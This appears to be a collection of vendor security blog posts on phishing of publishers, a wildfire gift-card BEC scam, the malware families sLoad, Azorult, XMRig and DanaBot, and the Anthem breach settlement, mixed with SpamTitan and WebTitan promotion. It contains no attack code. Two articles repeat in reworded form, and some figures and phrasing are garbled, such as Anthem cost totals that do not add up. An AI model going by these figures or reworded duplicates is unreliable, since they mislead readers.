Any company that stores sensitive information that can be sold for profit is in danger from cyberattacks, and publishers and literary scouting agencies are no different. Like any employer, scouting agencies and publishers hold sensitive information such as bank account numbers, credit card details, Social Security numbers, contract information, and W-2 Tax forms, all of which have a high value on the black market. The companies also normally complete wire transfers and are therefore targets for BEC hackers.

However, recently there have been many reports of phishing attacks on publishers and literary scouting agencies that attempt to obtain access to unpublished manuscripts and typescripts. These are always extremely valuable. If an advance copy of an eagerly awaited book can be obtained before it is released, there will be no shortage of fans willing to hand over money for a copy. Theft of manuscripts can result in extortion efforts with ransoms demanded to stop their publication online.

2018 has seen a major rise in phishing attacks on publishers and literary scouting agencies. At present, campaigns are being carried out by hackers that seem to have a good understanding of the sector. Highly realistic and plausible emails are being shared to publishing houses and agencies which use the proper industry terminology, which suggests they are the work of an industry insider.

A rise in phishing attacks on publishers on both sides of the Atlantic has been recorded, with the threat already having lead to  Penguin Random House North America to issue out warnings to employees to warn them regarding the threat.  According to a recent report in The Bookseller, many publishers have been targeted with phishing schemes like this, including Penguin Random House UK and Pan Macmillan.

Safeguarding from phishing attacks requires a combination of technical solutions, policies and procedures, and employee guidance.

Publishers and scouting agencies should implement software solutions that can prevent phishing attacks and prevent malicious emails from being sent to their employees’ inboxes.

SpamTitan is a strong anti-phishing tool that blocks 99.97% of spam emails and 100% of known malware. DMARC email-validation is included to detect email spoofing and stop malicious emails from arriving in employees’ inboxes.

End user training is also crucial to grow awareness of the risks of phishing. All staff should be shown how to recognize phishing emails and other email threats to see to it that they do not fall for these email scams.

If own a publishing house or literary scouting agency and would like to improve your cyber defenses, get in touch with the TitanHQ team today for further information on cybersecurity solutions that can enhance your security posture against phishing and other email and web-based dangers.

California Wildfire Scam Alerts Issued

A California wildfire scam is underway that asks for financial donations to help the victims of the recent wildfires. The emails look like they are being sent from the CEO of a company and are directed at its employees in the accounts and finance department.

It should come as no shock that hackers are taking advantage of yet another natural disaster and are trying to con people into giving donations. Hackers often take advantage of natural disasters to pull on the heart strings and defraud companies. Similar scams were carried out following the recent hurricanes that hit the United States and caused widespread damage.

The California wildfire scam, discovered by Agari, is a form of business email compromise (BEC) attack. The emails look like they have been sent by the CEO of a company, with his/her email address used to send messages to company staff. This is often achieved by spoofing the email address although in some instances the CEO’s email account has been compromised and is used to share the messages.

The California wildfire scam have one major red flag. Instead of seeking for a monetary donation, the scammers ask for Google play gift cards. The messages seek the redemption codes be sent back to the CEO by return.

The emails are sent to staff in the accounts and finance sections and the emails request that the money be sent in 4 x $500 denomination gift cards. If these are returned to the CEO, he/she will then forward them on to company clients that have been impacted by the California wildfires.

The reason Google play gift cards are sought is because they can easily be exchanged on the darknet for other currencies. The gift cards are virtually impossible to trace back to the hacker.

The messages are full of grammatical mistakes. However, scams such as this are conducted because they work. Many people have been fooled by similar scams previously.

Safeguarding against scams such as this requires technical controls, end user training and strong company policies. An advanced spam filtering solution should be implemented – SpamTitan for instance – to prevent messages such as these from landing in inboxes. SpamTitan reviews all incoming emails for spam signatures and uses advanced methods such as heuristics, machine learning, and Bayesian analysis to identify advanced and never-before-seen phishing campaigns.

End user training is vital for all staff, especially those with access to corporate bank accounts. Those people are regularly targeted by hackers. Policies should be introduced that mean all requests for changes to bank accounts, atypical payment requests, and wire transfers above a certain threshold to be approved by phone or in person before they are authorized.

 

Stealthy sLoad Downloader Performs Extensive Reconnaissance Before Delivering Payload

In recent months there have been new, versatile malware downloaders discovered that gather a significant amount of data about users’ systems before deploying a malicious payload. That payload is placed on the users’ system.

Marap malware and Xbash are two notable recent instances. Marap malware fingerprints a system and is capable of installing additional modules based on the results of the initial reconnaissance. XBash also reviews the system, and determines whether it is the best system for cryptocurrency mining or a ransomware attack and deploys its payload accordingly.

A further versatile and stealthy malware variant, name sLoad downloader, can now be placed on that list. SLoad was first discovered in May 2018, so it predates both of the above malware variants, although its use has been increasing.

The main aim of sLoad appears to be reconnaissance. Once installed on a system, it will figure out the location of the device based on the IP address and performs several checks to calculate the type of system and the software that is running and will determine whether it is on a real device or in a sandbox environment. It checks the processes operating on the system, compares against a hardcoded list, and will exit if certain security software is downloaded to avoid detection.

Once the system is suitable, a full scan of all running processes will be completed. The sLoad installer will search for Microsoft Outlook files, ICA files associated with Citrix, and other system information. sLoad is capable of capturing screenshots and searches the browser history looking for specific banking domains. All of this data is then fed back to the hackers’ C2 server.

Once the system has been fingerprinted, further malware variants are installed, primarily banking Trojans. Geofencing is used widely by the threat actors using sLoad which helps to ensure that banking Trojans are only placed on systems where they are likely to be effective – if the victim uses one of the banks that the Trojan is targeting.

In most of the campaigns seen so far, the banking Trojan of choice has been Ramnit. The attacks have also been very focused on specific countries including Canada, and latterly, Italy and the United Kingdom – Locations which are currently being attacked by Ramnit. Other malware variants linked to the sLoad downloader include the remote desktop tool DarkVNC, the Ursnif information stealer, DreamBot, and PsiBot.

The sLoad downloader is almost exclusively sent through spam email, with the campaigns often containing personal information such as the target’s name and address. While there have been many email subjects used, most commonly the emails relate to purchase orders, shipping notifications and missed packages.

The emails include Word documents with malicious macros in ZIP files, or alternatively embedded hyperlinks which will install the ZIP file if clicked.

The sLoad installer may be stealthy and versatile, but preventing the threat is possible with an advanced spam filter. End user training to condition staff never to click on hyperlinks from unknown senders or open attachments or allow macros will also help to stop infection.  Web filtering solutions supply an additional layer of protection to prevent attempts to download malicious files from the Internet.

Updated Version of Azorult Malware Being Shared via RIG Exploit Kit

An updated version of Azorult malware has been discovered. The most recent version of the data stealer and malware downloader has already been deployed in attacks and is being shared via the RIG exploit kit.

Azorult malware is mainly an information stealer which is used to download usernames and passwords, credit card numbers, and other data including browser histories. Newer versions of the malware have seen cryptocurrency wallet-stealing capabilities included.

Azorult malware was first spotted in 2016 by researchers at Proofpoint and has since been deployed in a large number of attacks via exploit kits and phishing email campaigns. The latter have used hyperlinks to malicious sites, or more commonly, malicious Word files with malware downloaders.

In 2016, the malware variant was first installed with the Chthonic banking Trojan, although more recent campaigns have seen Azorult malware deployed as the primary malware payload. This year has seen many different threat actors pair the information stealer with a secondary ransomware payload.

Campaigns have been noticed using Hermes and Aurora ransomware as secondary payloads. In both campaigns, the main aim is to obtain login credentials to raid bank accounts and cryptocurrency wallets. When all useful information has been taken, the ransomware is activated, and a ransom payment is requested to unlock the decrypted files.

A new version of the Azorult was distributed in July 2018 – version 3.2 – which included significant improvements to both its stealer and downloader functions.  Now Proofpoint researchers have discovered a new variant – version 3.3 – which has already been placed with RIG. The new variant was on the market shortly after the source code for the previous version was leaked online.

The new variant uses an alternative method of encryption, has improved cryptocurrency stealing functionality to permit the contents of BitcoinGold, electrumG, btcprivate (electrum-btcp), bitcore, and Exodus Eden wallets to be stolen, a new and improved loader, and a new admin panel. The latest version has a lower detection rate by AV software ensuring more installations.

The RIG exploit kit uses exploits for known flaws in Internet Explorer and Flash Player, which use JavaScript and VBScripts to download Azorult.

If your operating systems and software are always fully patched and current you will be secure from these exploit kit downloads as the vulnerabilities targeted by RIG are not new. However, many businesses are slow to apply patches, which need to be thoroughly  tested. It is therefore strongly advisable to also use a web filtering solution such as WebTitan to provide additional protection against exploit kit malware downloads. WebTitan stops end users from visiting malicious websites such as those hosting exploit kits.

The most recent version of Azorult malware was first put on sale on October 4. It is possible that other threat actors will buy the malware and distribute it via phishing emails, as was the case with older versions. It is therefore wise to also put in place an advanced spam filter and ensure that end users are shown how to recognize malicious emails.

New Version of Azorult Malware Being Distributed via RIG Exploit Kit

An undated strain of Azorult malware has been discovered which downloader has already been used in attacks and is being shared using the RIG exploit kit.

Azorult malware is mainly an information gatherer which is used to obtain usernames and passwords, credit card details, and other data including browser histories. Newer versions of the malware have seen cryptocurrency wallet-stealing capabilities included.

Azorult malware was first discovered in 2016 by researchers at Proofpoint and has since been utilized in a large number of attacks through exploit kits and phishing email campaigns. The latter have used links to malicious sites, or more typically, malicious Word files including malware downloaders.

Back in 2016, the malware variant was first installed in tandem with the Chthonic banking Trojan, although later campaigns have seen Azorult malware deployed as the primary malware payload. 2018 has seen multiple threat actors pair the information stealer with an accompanying ransomware payload.

Campaigns have been identified using Hermes and Aurora ransomware as secondary payloads. In both attacks, the initial target is to steal login details to raid bank accounts and cryptocurrency wallets. When all useful data has been obtained, the ransomware is enabled, and a ransom payment is requested in order to decrypted files.

A new strain of the Azorult was issued in July 2018 – version 3.2 – which contained major improvements to both its stealer and downloader functions.  Now Proofpoint researchers have discovered a new variant – version 3.3 – which has already been included with RIG. The new variant was released just after the source code for the previous version was leaked on the Internet.

The new variant uses an alternative method of encryption, has enhanced cryptocurrency stealing functionality to allow the contents of BitcoinGold, electrumG, btcprivate (electrum-btcp), bitcore, and Exodus Eden wallets to be obtained, a new and improved loader and an updated admin panel. The latest version is more difficult for AV software to notice ensuring more installations.

The RIG exploit kit uses exploits for known flaws in Internet Explorer and Flash Player, which use JavaScript and VBScripts to install Azorult.

If your operating systems and software are kept fully updated you will be safeguarded against these exploit kit downloads as the vulnerabilities exploited by RIG are not new. However, many businesses are slow to apply patches, which need to be extensively tested. It is therefore important to also deploy a web filtering solution.

XMRig Cryptocurrency Miner Installed Using Fake Adobe Flash Updates

Using fake software updates to spread malware is not a new phenomenon, but a new malware campaign has been discovered that is quite different. Fake Adobe Flash updates are being spread that actually do update the user’s Flash version, albeit with the addition of the XMRig cryptocurrency miner.

The campaign deploys pop-up notifications that are an exact replica of the authentic notifications used by Adobe, telling the user that their Flash version needs to be updated. Clicking on the install button, as with the authentic notifications, will update users’ Flash to the most recent version. However, in the background, the XMRig cryptocurrency miner is also downloaded and installed. Once downloaded, XMRig will operate silently in the background, unbeknown to the user.

The campaign was discovered by security experts at Palo Alto Network’s Unit 42 team. The researchers found several Windows executable files that began with AdobeFlashPlayer that were hosted on cloud servers not controlled by Adobe.

A review of network traffic during the infection process revealed most of the traffic was connected to updating Adobe Flash from an Adobe controlled domain, but that soon amended to traffic through a domain associated with downloaders known to push cryptocurrency miners. Traffic was later identified over TCP port 14444 that was associated with the XMRig cryptocurrency miner.

Additional analysis of the campaign showed it has been operating since mid-August, with activity increasing in September when the fake Adobe Flash updates started to be distributed more widely.

End users are unlikely to notice the downloading and installation of the XMRig cryptocurrency miner, but there is likely to be a noticeable slowdown in the operation of their computer. The installation of the XMRig cryptocurrency miner may be stealthy, but when it runs it takes up almost all of the computer’s CPU for cryptocurrency mining. Any user that reviews Task Manager will see Explorer.exe hogging their CPU. As with the majority of cryptocurrency miners, XMRig mines Monero. What is not currently obvious is which websites are distributing the fake Adobe Flash updates, or how traffic is being sent to those sites.

Any alert about a software update that pops up while browsing the internet should be dealt with as suspicious. The window should be shut, and the official website of that software supplier should be visited to determine if an update is required. Software updates should only ever be installed from official websites, in the case of Adobe Flash, that is Adobe.com.

The Palo Alto experts say “Organizations with decent web filtering and educated users have a much lower risk of infection by these fake updates.”

Anthem Data Breach Settlement for Spear Phishing Attack is $16 Million

Due to a massive data breach in 2015 in which 78.8 million health plan records were stolen, Anthem Inc.has settled a class action data breach for $115 million and OCR has now agreed a $16 million data breach settlement with the health insurer.

Before the announcement of the settlement , the unenviable record was held by Science Applications International Corporation, a vendor used by healthcare groups, that suffered a 4.9 million record breach in 2011. The Anthem data breach was on a completely different scale.

The hacking responsible for the Anthem data breach was clearly skilled. Mandiant, the cybersecurity company that assisted with the investigation, suspected the attack was a nation-state funded cyberattack. The hackers managed to obtain access to Anthem’s data warehouse and downloaded a huge volume of data undetected. The time of the first attack to discovery was almost a year.

While the attack was complex, a foothold in the network was not obtained through an elaborate hack or zero-day exploit but through phishing emails.

At least one staff member responded to a spear phishing email, sent to one of Anthem’s subsidiaries, which gave the hackers the entry point they needed to launch another attack and gain access to Anthem’s health plan member database.

The U.S. Department of Health and Human Services’ Office for Civil Rights (OCR) looks into healthcare data breaches that lead to the exposure or theft of 500 or more records. An in-depth review of the Anthem breach was therefore a certainty given its size. A fine for non-compliance with Health Insurance Portability and Accountability Act (HIPAA) Rules was a very likely outcome as HIPAA requires healthcare groups to safeguard health data. The scale of the breach also made it likely that it would lead to the largest ever penalty for a healthcare data breach.

Previous to the Anthem data breach settlement, the largest fine for a healthcare data breach was $5.55 million, which was agreed between OCR and Advocate Health Care Network in 2016. The Anthem data breach settlement was almost three times that figure, which reflected the seriousness of the breach, the number of people affected, and the extent to which HIPAA Rules were alleged to have been breached.

OCR claimed that Anthem Inc., had breached five provisions of HIPAA Rules, and by doing so failed to stop the breach and limit its severity. The Anthem data breach settlement was however agreed with no admission of liability.

The regulatory fine is just a small fraction of the total cost of the Anthem data breach. On top of the Anthem data breach settlement with OCR, Anthem faced multiple legal actions in the wake of the data breach. The consolidated class action lawsuit was settled by Anthem in January 2018 for $115 million.

The class action settlement document showed that Anthem had already paid $2.5 to consultants in the wake of the breach, $31 million was spent mailing alert letters, $115 million went on enhancements to security, and $112 million was paid to provide identity theft protection and credit monitoring services to affected plan subscribers.

With the $115 million class action settlement and the $16 million OCR settlement, that brings the overall cost of the Anthem data breach to $391.5 million.

At $391.5 million, that makes this the most costly healthcare phishing campaign by some distance and the cost clearly emphasises just how important it is to implement a defense-in-depth strategy to safeguard against phishing attacks.

Cloud Service Providers’ SSL Certificates Targeted by Office 365 Phishing Attacks

Office 365 phishing attacks are widely witnessed and very realistic, with Office 365 spam filtering controls are easily being bypassed by scammers to ensure messages reach inboxes.

Additionally, phishing forms are being hosted on webpages that are secured with valid Microsoft SLL certificates to fool users the websites are genuine.

If a phishing email making it past perimeter defenses and arriving in an inbox, there are a number of tell-tale signs that the email is not real.

Usually, there are often spelling mistakes, incorrect grammar, and the messages are sent from questionable senders or domains. To bolster the response rate, scammers are now spending much more time carefully crafting their phishing emails and they are often virtually indistinguishable from real communications from the brand they are spoofing. In terms of style, they are carbon copies of genuine emails complete with the branding, contact data, sender details, and logos of the company being spoofed. The subject is perfectly believable and the content well written. The actions the user is asked to complete are perfectly plausible.

Hyperlinks in emails that bring users to a website where they are required to fill out their login credentials. At this stage of the phishing attack there are usually additional signs that all is not as it seems. A warning may be included in a pop up to say that the website may not be genuine, the website may begin with HTTP rather than the secure HTTPS, or the SSL certificate may not be owned by the business that the website is spoofing.

Even these tell-tale signs are not always evident, as has been shown is many recent Office 365 phishing attacks, which have the phishing forms hosted on webpages that have existing real Microsoft SSL certificates or SSL certificates that have been issued to other cloud service providers such as CloudFlare, DocuSign, or Google.

Office 365 users are being focused on by scammers as they know Office 365 phishing controls can be easily got around. Even with Microsoft’s Advanced Threat Protection for Office 365, phishing emails are still delivered. A 2017 study by SE Labs showed even with this more anti-phishing control, Office 365 anti-phishing measures were only rated in the low-middle of the market for security offered. With only the basic Exchange Online Protection, the protection was worse again.

Whether you operate an SMB or a large enterprise, you are likely to be sent high volumes of spam and phishing emails and many messages will be delivered to end users’ inboxes. Since the emails can be virtually impossible for end users to identify as dangerous, it is probable that all but the most experienced, well trained, security conscious workers will be tricked. What is therefore needed is an advanced third-party spam filtering solution that will work in tandem with Office 365 spam filtering controls to provide far greater security.

While Office 365 will prevent spam emails and phishing emails (Osterman Research proved it blocks 100% of known malware), it has been shown to lack performance against advanced phishing threats like spear phishing.

Office 365 does not have the same range of predictive technology as dedicated on-premises and cloud-based email security gateways which are much better at detecting zero-day attacks, new malware, and advanced spear phishing attacks.

To enhance protection you require a dedicated third-party spam filtering solution for Office 365 such as SpamTitan. SpamTitan focuses on defense in depth, and provides better protection against advanced phishing attacks, new malware, and complex email attacks to ensure malicious messages are blocked or quarantined instead of being delivered to end users’ inboxes. Some of the additional security measures provided by SpamTitan against Office 365 phishing attacks are detailed in the image below:

To discover more about making Office 365 safer and how SpamTitan can be of advantage to your company, get in touch with TitanHQ.

 

U.S. Banks Being Attacked by DanaBot Trojan

In May, security experts at Proofpoint noticed a spam email campaign that was sharing a new banking Trojan named DanaBot. At the time it was believed to be a single threat actor was using the DanaBot Trojan to target groups in Australia to obtain online banking details.

That campaign is still ongoing, but in addition, campaigns have been identified in Europe attacking customers of banks in Italy, Germany, Poland, Austria, and the UK. Then in late September, a further DanaBot Trojan campaign was carried out targeting U.S. banks.

The DanaBot Trojan is a modular malware coded in Delphi that can install additional components to add various different functions.

The malware is can capture screenshots, stealing form data, and logging keystrokes in order to obtain banking details. That data is sent back to the hackers’ C2 server and is subsequently used to steal money from corporate bank accounts.

A review of the malware and the geographical campaigns shows different IDs are used in the C2 communication headers. This strongly implies that the campaigns in each region are being carried out by different individuals and that the DanaBot Trojan is being provided as malware-as-a-service. Each threat actor is to blame for running campaigns in a specific country or set of countries. Australia is the only country where there are two affiliates operating campaigns. Overall, there appears to currently be 9 individuals running distribution campaigns.

The country-specific campaigns are employing different methods to share the malicious payload, including the new Fallout exploit kit, web injects, and spam email. The latter of which is being used to distribute the Trojan in the United States.

The U.S. campaign uses a fax notice lure with the emails seeming to come from the eFax service. The messages look professional and include all the appropriate formatting and logos. The emails contain a button that must be clicked to download the 3-page fax message to the device.

Clicking on the button will install a Word document with a malicious macro which, if allowed to operate, will initiate a PowerShell script that downloads the Hancitor downloader. Hancitor will then download the Pony stealer and the DanaBot Trojan.

Proofpoint’s investigation into the malware revealed similarities with the ransomware groups Reveton and CryptXXX, which suggests that DanaBot has been created by the same group responsible for both of those ransomware threats.

The U.S. DanaBot campaign is attacking customers of various U.S. banks, including RBC Royal Bank, Royal Bank, TD Bank, Wells Fargo, Bank of America, and JP Morgan Chase.  It is probably that the campaigns will spread to other countries as more threat actors are signed up to use the malware.

Stopping attacks requires defense in depth against all attack vectors. An advanced spam filter is needed to block malspam. Users of Office 365 should enhance protection with a third-party spam filter such as SpamTitan to provide better security against this threat. To prevent web-based attacks, a web filtering solution should be implemented. WebTitan can block efforts by end users to visit websites known to include exploit kits and IPs that have previously been used for malicious reasons.

End users should also advised never to open email attachments or click on hyperlinks in emails from unknown senders, or to allow macros on documents unless they are 100% certain that the files are authentic. Companies in the United States should also think about warning their employees about fake eFax emails to raise awareness of the danger.

U.S. Bank Customers Targeted by DanaBot Trojan

Last May, security specialists at Proofpoint identified a spam email campaign that was sharing a new banking Trojan titled DanaBot. At first it was thought that a single threat actor was using the DanaBot Trojan to target groups in Australia to obtain online banking details.

That campaign has persisted, but in addition, campaigns have been noticed in Europe targeting customers of banks in Italy, Germany, Poland, Austria, and the UK. Then last month a further DanaBot Trojan campaign was carried out targeting U.S. banks.

The DanaBot Trojan is a modular malware programmed in Delphi that can install additional components to add various different functions.

The malware can capture screenshots, obtain form data, and record keystrokes in order to obtain banking credentials. That data is sent back to the attackers’ C2 server and is then used to steal money from corporate bank accounts.

A review of the malware and the geographical campaigns shows alternative IDs are used in the C2 communication headers. This strongly suggests that the attacks in each region are being carried out by different individuals and that the DanaBot Trojan is being provided as malware-as-a-service. Each threat actor is charged with running campaigns in a specific country or set of countries. Australia is the only country where there are two affiliates conducting campaigns. Overall, there appears to currently be nine hackers running distribution campaigns.

The country-specific campaigns are using a variety of tools to distribute the malicious payload, which include the new Fallout exploit kit, web injects, and spam email. The latter is being used to share the Trojan in the United States.

The U.S. campaign sends a fax notice lure with the emails seeming to come from the eFax service. The messages look authentic and are complete with appropriate formatting and logos. The emails include a button that must be clicked to download the 3-page fax message.

Clicking on the button will install a Word document with a malicious macro which, if permitted to run, will initiate a PowerShell script that downloads the Hancitor downloader. Hancitor will then install the Pony stealer and the DanaBot Trojan.

Proofpoint’s review of the malware revealed similarities with the ransomware groups Reveton and CryptXXX, which suggests that DanaBot has been developed by the same group to blame for both of those ransomware threats.

The U.S. DanaBot campaign is focused on customers of various U.S. banks, including RBC Royal Bank, Royal Bank, TD Bank, Wells Fargo, Bank of America, and JP Morgan Chase.  It is probable that the campaigns will spread to other countries as more threat actors begin to use the malware.

Stopping attacks requires detailed defense against each of the attack vectors. An advanced spam filter is necessary to block malspam. Subscribers to Office 365 should increase protection with a third-party spam filter such as SpamTitan to supply better protection against this threat. To stop web-based attacks, a web filtering solution should be implemented. WebTitan can block efforts by end users to visit websites known to include exploit kits and IPs that have previously been used for malicious aims.

End users should also advised to never open email attachments or visit hyperlinks in emails from unknown senders, or to enable macros on documents unless they are 100% certain that the files are authentic. Companies in the United States should also think about warning their employees about fake eFax emails to increase awareness of the threat.